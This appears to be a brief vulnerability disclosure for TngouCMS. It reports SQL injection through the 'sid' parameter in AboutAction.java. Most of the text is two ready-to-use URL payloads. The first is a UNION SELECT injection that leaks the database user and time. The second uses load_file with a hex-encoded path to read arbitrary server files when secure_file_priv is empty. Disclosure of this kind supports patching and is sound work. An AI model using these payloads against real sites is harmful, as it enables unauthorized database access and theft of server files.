代码拉取完成,页面将自动刷新
Parameter sid
not strictly filtered in AboutAction.java leads to SQL injection
http://127.0.0.1:8080/TngouCMS/action/about/execute/(-1)union(select(1),(2),(3),(user()),(5),(6),(now()))/
If the mysql configuration enables secure_file_priv=''
, we can read any file:
http://127.0.0.1:8080/TngouCMS/action/about/execute/(-1)union(select(1),(2),(3),(select(substr(load_file(0x633a2f2f77696e646f77732f77696e2e696e69),1,30))),(5),(6),(now()))/